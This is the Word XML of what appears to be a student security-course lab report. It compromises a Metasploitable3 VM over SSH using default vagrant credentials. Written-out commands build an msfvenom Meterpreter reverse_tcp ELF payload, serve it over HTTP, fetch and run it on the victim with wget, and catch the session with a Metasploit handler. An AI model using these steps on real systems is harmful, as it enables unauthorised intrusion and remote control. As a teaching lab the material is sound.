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834644529"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="16F629F3" w14:textId="252BB586" w:rsidR="007717CA" w:rsidRDefault="007717CA">
          <w:pPr>
            <w:pStyle w:val="NoSpacing"/>
            <w:spacing w:before="1540" w:after="240"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:color w:val="156082" w:themeColor="accent1"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:color w:val="156082" w:themeColor="accent1"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CD4C774" wp14:editId="79F47FE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F138D6DAE784C71A19EE58649B4BE3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CB416D5" w14:textId="3DBAE217" w:rsidR="007717CA" w:rsidRDefault="007717C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ICS344 PROJECT</w:t>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:color w:val="156082" w:themeColor="accent1"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:alias w:val="Subtitle"/>
            <w:tag w:val=""/>
            <w:id w:val="328029620"/>
            <w:placeholder>
              <w:docPart w:val="2675F55044CA4D108A2D3DA9A8FCB3FB"/>
            </w:placeholder>
            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
            <w:text/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w14:paraId="23DCD521" w14:textId="1CB27DFD" w:rsidR="007717CA" w:rsidRDefault="00B41B50">
              <w:pPr>
                <w:pStyle w:val="NoSpacing"/>
                <w:jc w:val="center"/>
                <w:rPr>
                  <w:color w:val="156082" w:themeColor="accent1"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:color w:val="156082" w:themeColor="accent1"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                </w:rPr>
                <w:t>SECTION 03</w:t>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
        <w:p w14:paraId="69E90E41" w14:textId="7A6F0906" w:rsidR="007717CA" w:rsidRDefault="007717CA">
          <w:pPr>
            <w:pStyle w:val="NoSpacing"/>
            <w:spacing w:before="480"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:color w:val="156082" w:themeColor="accent1"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:color w:val="156082" w:themeColor="accent1"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10438372" wp14:editId="6CE0D85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BEA9FD" w14:textId="10BA216B" w:rsidR="007717CA" w:rsidRDefault="00772B92">
          <w:r>
            <w:rPr>
              <w:noProof/>
              <w:color w:val="156082" w:themeColor="accent1"/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33DCE903" wp14:editId="4FA0D19F">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="margin">
                      <wp:align>right</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622300"/>
                    <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                    <wp:wrapNone/>
                    <wp:docPr id="142" name="Text Box 146"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr txBox="1"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="6553200" cy="622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E4CFBF" w14:textId="3305C365" w:rsidR="007717CA" w:rsidRDefault="00AD4F03" w:rsidP="00AD4F03">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:jc w:val="center"/>
                                  <w:rPr>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t>ABDULAZIZ ALTAMIMI 201962250</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="66E67475" w14:textId="7B110EA6" w:rsidR="00AD4F03" w:rsidRPr="00AD4F03" w:rsidRDefault="00AD4F03" w:rsidP="00AD4F03">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:jc w:val="center"/>
                                  <w:rPr>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:color w:val="156082" w:themeColor="accent1"/>
                                    <w:sz w:val="28"/>
                                    <w:szCs w:val="28"/>
                                  </w:rPr>
                                  <w:t>ABDULMAJEED ALGHAMDI 202032860</w:t>
                                </w:r>
                              </w:p>
                              <w:p w14:paraId="040293E1" w14:textId="6D61726B" w:rsidR="007717CA" w:rsidRPr="007717CA" w:rsidRDefault="007717CA" w:rsidP="00B41B50">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:rPr>
                                    <w:color w:val="156082"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3DCE903" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                    <v:stroke joinstyle="miter"/>
                    <v:path gradientshapeok="t" o:connecttype="rect"/>
                  </v:shapetype>
                  <v:shape id="Text Box 146" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:464.8pt;margin-top:0;width:516pt;height:49pt;z-index:251658752;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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox inset="0,0,0,0">
                      <w:txbxContent>
                        <w:p w14:paraId="2BE4CFBF" w14:textId="3305C365" w:rsidR="007717CA" w:rsidRDefault="00AD4F03" w:rsidP="00AD4F03">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>ABDULAZIZ ALTAMIMI 201962250</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="66E67475" w14:textId="7B110EA6" w:rsidR="00AD4F03" w:rsidRPr="00AD4F03" w:rsidRDefault="00AD4F03" w:rsidP="00AD4F03">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                            <w:t>ABDULMAJEED ALGHAMDI 202032860</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="040293E1" w14:textId="6D61726B" w:rsidR="007717CA" w:rsidRPr="007717CA" w:rsidRDefault="007717CA" w:rsidP="00B41B50">
                          <w:pPr>
                            <w:pStyle w:val="NoSpacing"/>
                            <w:rPr>
                              <w:color w:val="156082" w:themeColor="accent1"/>
                              <w:sz w:val="28"/>
                              <w:szCs w:val="28"/>
                            </w:rPr>
                          </w:pPr>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap anchorx="margin" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="007717CA">
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="632DCBF5" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 1.1 – Exploiting SSH using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF65563" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:r>
        <w:br/>
        <w:t>Target Service: SSH (Port 22)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Tool Used: Metasploit Framework</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Environment: Kali Linux (attacker) &amp; Metasploitable3 (victim)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Target IP: 10.0.2.15</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Attacker IP: 10.0.2.4</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Credentials Used:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Username: vagrant</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Password: vagrant</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B369991" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t>Steps Performed:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">1. Enumerated open ports and confirmed that SSH (port 22) was available on the victim machine. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="413F6BAB" wp14:editId="39125BA9">
            <wp:extent cx="5461635" cy="1885315"/>
            <wp:effectExtent l="0" t="0" r="5715" b="635"/>
            <wp:docPr id="10390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1635" cy="1885315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2. Gained SSH access using valid credentials.</w:t>
      </w:r>
      <w:r w:rsidRPr="00877821">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10532263" wp14:editId="605AE816">
            <wp:extent cx="5480050" cy="1214755"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="2233265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656" name="Picture 2"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1214755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AE5160" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5274B9E6" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630C874B" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72AF20CF" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3519CDE5" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438A99DD" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>3. Generated a malicious ELF payload using msfvenom:</w:t>
      </w:r>
      <w:r w:rsidRPr="00877821">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A866FB5" wp14:editId="327832D2">
            <wp:extent cx="5478197" cy="801222"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74394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76213" b="-1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5480050" cy="801493"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4. Served the payload via a Python HTTP server:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB1DB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D8615" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -m http.server 8000</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>5. Logged into the victim machine using SSH and downloaded the payload:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   wget http://10.0.2.4:8000/shell.elf</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   chmod +x shell.elf.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48426161" wp14:editId="359E9DD5">
            <wp:extent cx="5480050" cy="1697277"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="15781165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6549" name="Picture 4" descr="A screenshot of a compute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b="35014"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5480050" cy="1697277"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   ./shell.elf.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4DA274" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t>6. Started a Metasploit handler on the attacker's machine:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   use exploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   set PAYLOAD linux/x86/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   set LHOST 10.0.2.4</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   set LPORT 4444</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   run</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>7. Achieved a successful Meterpreter session, granting full control over the target system.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2119B4D2" wp14:editId="15588493">
            <wp:extent cx="5480050" cy="682625"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
            <wp:docPr id="1106862570"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62570" name="Picture 7" descr="A black background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682625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E1948" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:r>
        <w:t>Result: SSH service successfully exploited, and Meterpreter shell was obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFC8A2B" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769"/>
    <w:p w14:paraId="424D5123" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769"/>
    <w:p w14:paraId="338141DA" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C82243" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 1.2 – Custom Exploitation Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D7248E" w14:textId="77777777" w:rsidR="004D7769" w:rsidRPr="00F12A25" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:r>
        <w:t>Open python http server through kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE095E8" wp14:editId="5EE3CE1B">
            <wp:extent cx="5480050" cy="807720"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1317040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0344"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050" cy="807720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A2289E" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:r>
        <w:t>Open msfconsole then write the commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6466C011" wp14:editId="54E33958">
            <wp:extent cx="5480050" cy="1246339"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="124017030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70301" name="Picture 9" descr="A screenshot of a comput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30424"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5480050" cy="1246339"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FCE9E3" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:r>
        <w:t>Run the python code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C1BD7C3" wp14:editId="433111CE">
            <wp:extent cx="5480050" cy="2730500"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="424668072" name="Picture 1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8072" name="Picture 10" descr="A computer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2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA5794C" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:r>
        <w:t>Check listener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C84EDFE" wp14:editId="22AB012B">
            <wp:extent cx="5480050" cy="1791335"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="86666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1791335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="732B5A3C" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Target Service: SSH (Port 22) on Metasploitable3 (10.0.2.15)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Objective: Compromise the target service using a custom script (Proof of Concept) that demonstrates automated exploitation.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="613192ED" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:r>
        <w:br/>
        <w:t>Environment:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Attacker: 10.0.2.4 (Kali Linux)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Victim: 10.0.2.15 (Metasploitable 3)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02121F2C" w14:textId="527E9831" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="0073390A">
      <w:r>
        <w:br/>
        <w:t>Steps Taken:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>1. Reverse Shell Payload Creation:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.4 LPORT=4444 -f elf &gt; shell.elf</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   python3 -m http.server 8000</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2. Custom Exploit Script (Python):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0073390A" w:rsidRPr="0073390A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5976BCFC" wp14:editId="3FBE033D">
            <wp:extent cx="3601496" cy="4403750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4550771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77117" name="Picture 1" descr="A screen shot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3623939" cy="4431192"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4286D2" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>3. Metasploit Handler Configuration:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   use exploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   set PAYLOAD linux/x86/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   set LHOST 10.0.2.4</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   set LPORT 4444</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   run</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4. Execution:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   python3 hacksh.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>The payload was transferred, executed, and a reverse connection was established to the Metasploit handler.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3AE3BB" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769" w:rsidP="004D7769">
      <w:r>
        <w:t>Result: Successful remote code execution was achieved via SSH using a custom script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B27BC3" w14:textId="77777777" w:rsidR="00223651" w:rsidRDefault="00223651">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126E7231" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
